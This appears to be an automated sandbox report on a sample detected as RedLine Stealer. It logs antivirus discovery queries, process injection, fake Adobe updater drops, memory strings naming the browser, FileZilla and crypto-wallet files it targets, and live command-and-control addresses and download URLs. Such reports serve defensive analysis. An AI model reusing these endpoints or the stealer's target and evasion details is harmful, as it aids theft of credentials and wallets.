Source: C:\Users\user\AppData\Local\Temp\build.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe Queries volume information: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe Queries volume information: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\Plain_Checker.exe Queries volume information: C:\Users\user\AppData\Local\Temp\Plain_Checker.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\Plain_Checker.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\build.exe Queries volume information: C:\Users\user\AppData\Local\Temp\build.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\build.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\build.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\build.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\build.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\build.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\build.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\build.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\build.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\build.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\build.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\build.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Yftssfzf.exe Queries volume information: C:\Users\user\AppData\Roaming\Yftssfzf.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\Yftssfzf.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Yftssfzf.exe Queries volume information: C:\Users\user\AppData\Roaming\Yftssfzf.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\Yftssfzf.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation
Source: C:\Users\user\Desktop\6RE1Z857ae.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
AV process strings found (often used to terminate AV products)
Source: build.exe, 00000020.00000002.2643496488.00000000060D8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Source: C:\Users\user\AppData\Local\Temp\build.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Users\user\AppData\Local\Temp\build.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
Source: C:\Users\user\AppData\Local\Temp\build.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
Source: C:\Users\user\AppData\Local\Temp\build.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
Source: C:\Users\user\AppData\Local\Temp\build.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct
Source: C:\Users\user\AppData\Local\Temp\build.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
Source: C:\Users\user\AppData\Local\Temp\build.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Users\user\AppData\Local\Temp\build.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
Source: C:\Users\user\AppData\Local\Temp\build.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
Source: C:\Users\user\AppData\Local\Temp\build.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
Source: C:\Users\user\AppData\Local\Temp\build.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct
Source: C:\Users\user\AppData\Local\Temp\build.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct

Stealing of Sensitive Information
barindex
Yara detected RedLine Stealer
Source: Yara match File source: dump.pcap, type: PCAP
Source: Yara match File source: 5.0.build.exe.b30000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.6RE1Z857ae.exe.3fe9550.10.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.6RE1Z857ae.exe.3fe9550.10.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000005.00000002.2297222568.0000000002EB0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000000.2141464839.0000000000B32000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2204855208.0000000003FE9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 6RE1Z857ae.exe PID: 6984, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: build.exe PID: 1020, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: build.exe PID: 4672, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\build.exe, type: DROPPED
Found many strings related to Crypto-Wallets (likely being stolen)
Source: 6RE1Z857ae.exe, 00000000.00000002.2204855208.0000000003FE9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: [^\u0020-\u007F]ProcessIdname_on_cardencrypted_valuehttps://ipinfo.io/ip%appdata%\logins{0}\FileZilla\recentservers.xml%appdata%\discord\Local Storage\leveldb\tdataAtomicWalletv10/C \EtFile.IOhereuFile.IOm\walFile.IOletsESystem.UItherSystem.UIeumElectrum[AString-ZaString-z\d]{2String4}\.[String\w-]{String6}\.[\wString-]{2String7}profiles\Windows\valueexpiras21ation_moas21nth
Source: 6RE1Z857ae.exe, 00000000.00000002.2204855208.0000000003FE9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: user.config{0}\FileZilla\sitemanager.xmlcookies.sqlite\Program Files (x86)\configRoninWalletdisplayNamehost_key\Electrum\walletsName\Exodus\exodus.walletnanjmdknhkinifnkgdcggcfnhdaammmjtdataexpires_utc\Program Data\coMANGOokies.sqMANGOlite*ssfn*ExodusDisplayVersion%localappdata%\GuildWalletOpHandlerenVPHandlerN ConHandlernect%DSK_23%YoroiWalletcmdOpera GXhttps://api.ipify.orgcookies//settinString.Removeg[@name=\PasswString.Removeord\]/valuString.RemoveeSaturnWalletWeb DataSteamPathwaasflleasft.datasfCommandLineSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallCookiesis_secureSoftware\Valve\SteamLogin DataID: isSecureNoDefrdDefVPNDefwaasflletasfMewCxv11\Program Files\Opera GX StableSELECT * FROM Win32_Process Where SessionId='nlbmnnijcnlegkjjpcfjclmcfggfefdmnkddgncdjgjfcddamfgcmfnlhccnimig\coFile.IOm.libeFile.IOrty.jFile.IOaxFile.IOxnamefnjhmkhhmkbjkkabndcnnogagogbneecfhilaheimglignddkjgofkcbgekhenbhProfile_Unknowncard_number_encrypted, Name: AppData\Roaming\TReplaceokReplaceenReplaces.tReplacext //settString.Replaceing[@name=\UString.Replacesername\]/vaString.ReplacelueNWinordVWinpn.eWinxe*Winhostmoz_cookiesUser Datawindows-1251, CommandLine: \ExodusDisplayNameexpiry*.vstring.ReplacedfJaxxpathBSJB
Source: 6RE1Z857ae.exe, 00000000.00000002.2204855208.0000000003FE9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: user.config{0}\FileZilla\sitemanager.xmlcookies.sqlite\Program Files (x86)\configRoninWalletdisplayNamehost_key\Electrum\walletsName\Exodus\exodus.walletnanjmdknhkinifnkgdcggcfnhdaammmjtdataexpires_utc\Program Data\coMANGOokies.sqMANGOlite*ssfn*ExodusDisplayVersion%localappdata%\GuildWalletOpHandlerenVPHandlerN ConHandlernect%DSK_23%YoroiWalletcmdOpera GXhttps://api.ipify.orgcookies//settinString.Removeg[@name=\PasswString.Removeord\]/valuString.RemoveeSaturnWalletWeb DataSteamPathwaasflleasft.datasfCommandLineSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallCookiesis_secureSoftware\Valve\SteamLogin DataID: isSecureNoDefrdDefVPNDefwaasflletasfMewCxv11\Program Files\Opera GX StableSELECT * FROM Win32_Process Where SessionId='nlbmnnijcnlegkjjpcfjclmcfggfefdmnkddgncdjgjfcddamfgcmfnlhccnimig\coFile.IOm.libeFile.IOrty.jFile.IOaxFile.IOxnamefnjhmkhhmkbjkkabndcnnogagogbneecfhilaheimglignddkjgofkcbgekhenbhProfile_Unknowncard_number_encrypted, Name: AppData\Roaming\TReplaceokReplaceenReplaces.tReplacext //settString.Replaceing[@name=\UString.Replacesername\]/vaString.ReplacelueNWinordVWinpn.eWinxe*Winhostmoz_cookiesUser Datawindows-1251, CommandLine: \ExodusDisplayNameexpiry*.vstring.ReplacedfJaxxpathBSJB
Source: 6RE1Z857ae.exe, 00000000.00000002.2204855208.0000000003FE9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: user.config{0}\FileZilla\sitemanager.xmlcookies.sqlite\Program Files (x86)\configRoninWalletdisplayNamehost_key\Electrum\walletsName\Exodus\exodus.walletnanjmdknhkinifnkgdcggcfnhdaammmjtdataexpires_utc\Program Data\coMANGOokies.sqMANGOlite*ssfn*ExodusDisplayVersion%localappdata%\GuildWalletOpHandlerenVPHandlerN ConHandlernect%DSK_23%YoroiWalletcmdOpera GXhttps://api.ipify.orgcookies//settinString.Removeg[@name=\PasswString.Removeord\]/valuString.RemoveeSaturnWalletWeb DataSteamPathwaasflleasft.datasfCommandLineSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallCookiesis_secureSoftware\Valve\SteamLogin DataID: isSecureNoDefrdDefVPNDefwaasflletasfMewCxv11\Program Files\Opera GX StableSELECT * FROM Win32_Process Where SessionId='nlbmnnijcnlegkjjpcfjclmcfggfefdmnkddgncdjgjfcddamfgcmfnlhccnimig\coFile.IOm.libeFile.IOrty.jFile.IOaxFile.IOxnamefnjhmkhhmkbjkkabndcnnogagogbneecfhilaheimglignddkjgofkcbgekhenbhProfile_Unknowncard_number_encrypted, Name: AppData\Roaming\TReplaceokReplaceenReplaces.tReplacext //settString.Replaceing[@name=\UString.Replacesername\]/vaString.ReplacelueNWinordVWinpn.eWinxe*Winhostmoz_cookiesUser Datawindows-1251, CommandLine: \ExodusDisplayNameexpiry*.vstring.ReplacedfJaxxpathBSJB
Source: InstallUtil.exe, 0000002D.00000002.2689709699.0000000002BC1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: Ethereum
Source: 6RE1Z857ae.exe, 00000000.00000002.2197191438.0000000003198000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: set_UseMachineKeyStore
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\user\AppData\Local\Temp\build.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite
Source: C:\Users\user\AppData\Local\Temp\build.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\AppData\Local\Temp\build.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\build.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Tries to steal Crypto Currency Wallets
Source: C:\Users\user\AppData\Local\Temp\build.exe File opened: C:\Users\user\AppData\Roaming\atomic\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe File opened: C:\Users\user\AppData\Roaming\Ethereum\wallets\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe File opened: C:\Users\user\AppData\Roaming\Exodus\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe File opened: C:\Users\user\AppData\Roaming\Guarda\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe File opened: C:\Users\user\AppData\Roaming\atomic\
Source: C:\Users\user\AppData\Local\Temp\build.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
Source: C:\Users\user\AppData\Local\Temp\build.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
Source: C:\Users\user\AppData\Local\Temp\build.exe File opened: C:\Users\user\AppData\Roaming\Ethereum\wallets\
Source: C:\Users\user\AppData\Local\Temp\build.exe File opened: C:\Users\user\AppData\Roaming\Exodus\
Source: C:\Users\user\AppData\Local\Temp\build.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Users\user\AppData\Local\Temp\build.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Users\user\AppData\Local\Temp\build.exe File opened: C:\Users\user\AppData\Roaming\Guarda\
Source: C:\Users\user\AppData\Local\Temp\build.exe File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\
Yara detected Credential Stealer
Source: Yara match File source: 5.0.build.exe.b30000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.6RE1Z857ae.exe.3fe9550.10.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.6RE1Z857ae.exe.3fe9550.10.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000031.00000002.2687620249.0000000002EE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000002D.00000002.2689709699.0000000002BC1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000000.2141464839.0000000000B32000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2204855208.0000000003FE9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 6RE1Z857ae.exe PID: 6984, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: build.exe PID: 1020, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: build.exe PID: 4672, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: InstallUtil.exe PID: 7508, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: InstallUtil.exe PID: 7652, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\build.exe, type: DROPPED

Remote Access Functionality
barindex
Yara detected RedLine Stealer
Source: Yara match File source: dump.pcap, type: PCAP
Source: Yara match File source: 5.0.build.exe.b30000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.6RE1Z857ae.exe.3fe9550.10.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.6RE1Z857ae.exe.3fe9550.10.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000005.00000002.2297222568.0000000002EB0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000000.2141464839.0000000000B32000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2204855208.0000000003FE9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 6RE1Z857ae.exe PID: 6984, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: build.exe PID: 1020, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: build.exe PID: 4672, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\build.exe, type: DROPPED
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1534363 Sample: 6RE1Z857ae.exe Startdate: 15/10/2024 Architecture: WINDOWS Score: 100 96 api.ip.sb 2->96 108 Suricata IDS alerts for network traffic 2->108 110 Found malware configuration 2->110 112 Malicious sample detected (through community Yara rule) 2->112 114 13 other signatures 2->114 10 6RE1Z857ae.exe 16 6 2->10         started        15 Adobe_Install_Updater.exe 2->15         started        17 Adobe_Install_Updater.exe 2->17         started        19 2 other processes 2->19 signatures3 process4 dnsIp5 98 87.120.127.223, 42128, 49704, 49705 UNACS-AS-BG8000BurgasBG Bulgaria 10->98 88 C:\Users\user\...\Adobe_Install_Updater.exe, PE32 10->88 dropped 90 C:\Users\user\AppData\Local\Temp\build.exe, PE32 10->90 dropped 92 Adobe_Install_Upda...exe:Zone.Identifier, ASCII 10->92 dropped 132 Found many strings related to Crypto-Wallets (likely being stolen) 10->132 134 Creates multiple autostart registry keys 10->134 136 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 10->136 21 build.exe 14 50 10->21         started        24 cmd.exe 1 10->24         started        33 2 other processes 10->33 138 Multi AV Scanner detection for dropped file 15->138 140 Writes to foreign memory regions 15->140 142 Allocates memory in foreign processes 15->142 26 InstallUtil.exe 15->26         started        35 2 other processes 15->35 144 Injects a PE file into a foreign processes 17->144 29 build.exe 17->29         started        31 InstallUtil.exe 17->31         started        37 2 other processes 17->37 39 6 other processes 19->39 file6 signatures7 process8 file9 116 Antivirus detection for dropped file 21->116 118 Multi AV Scanner detection for dropped file 21->118 120 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 21->120 130 2 other signatures 21->130 41 conhost.exe 21->41         started        122 Uses ipconfig to lookup or modify the Windows network settings 24->122 45 2 other processes 24->45 86 C:\Users\user\AppData\...\Plain_Checker.exe, PE32 26->86 dropped 124 Injects a PE file into a foreign processes 26->124 47 4 other processes 26->47 126 Tries to harvest and steal browser information (history, passwords, etc) 29->126 128 Tries to steal Crypto Currency Wallets 29->128 43 conhost.exe 29->43         started        51 3 other processes 31->51 53 2 other processes 33->53 55 4 other processes 35->55 57 4 other processes 37->57 59 8 other processes 39->59 signatures10 process11 file12 94 C:\Users\user\AppData\Roaming\Yftssfzf.exe, PE32 47->94 dropped 100 Multi AV Scanner detection for dropped file 47->100 102 Machine Learning detection for dropped file 47->102 104 Creates multiple autostart registry keys 47->104 106 2 other signatures 47->106 61 InstallUtil.exe 47->61         started        64 cmd.exe 47->64         started        66 cmd.exe 47->66         started        76 4 other processes 47->76 68 conhost.exe 51->68         started        70 ipconfig.exe 51->70         started        72 conhost.exe 51->72         started        74 ipconfig.exe 51->74         started        signatures13 process14 signatures15 146 Found many strings related to Crypto-Wallets (likely being stolen) 61->146 78 conhost.exe 64->78         started        80 ipconfig.exe 64->80         started        82 conhost.exe 66->82         started        84 ipconfig.exe 66->84         started        process16
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
87.120.127.223
 unknown Bulgaria
25206 UNACS-AS-BG8000BurgasBG true

Contacted Domains

Name IP Active
api.ip.sb unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://87.120.127.223:42128/ true
    		unknown
    http://87.120.127.223/panel/uploads/Fdzqloat.dat true
      		unknown
      http://87.120.127.223/panel/uploads/Mexuazc.pdf true
        		unknown
        87.120.127.223:42128 true
          		unknown
          http://87.120.127.223/panel/uploads/Afocvkc.dat true
            		unknown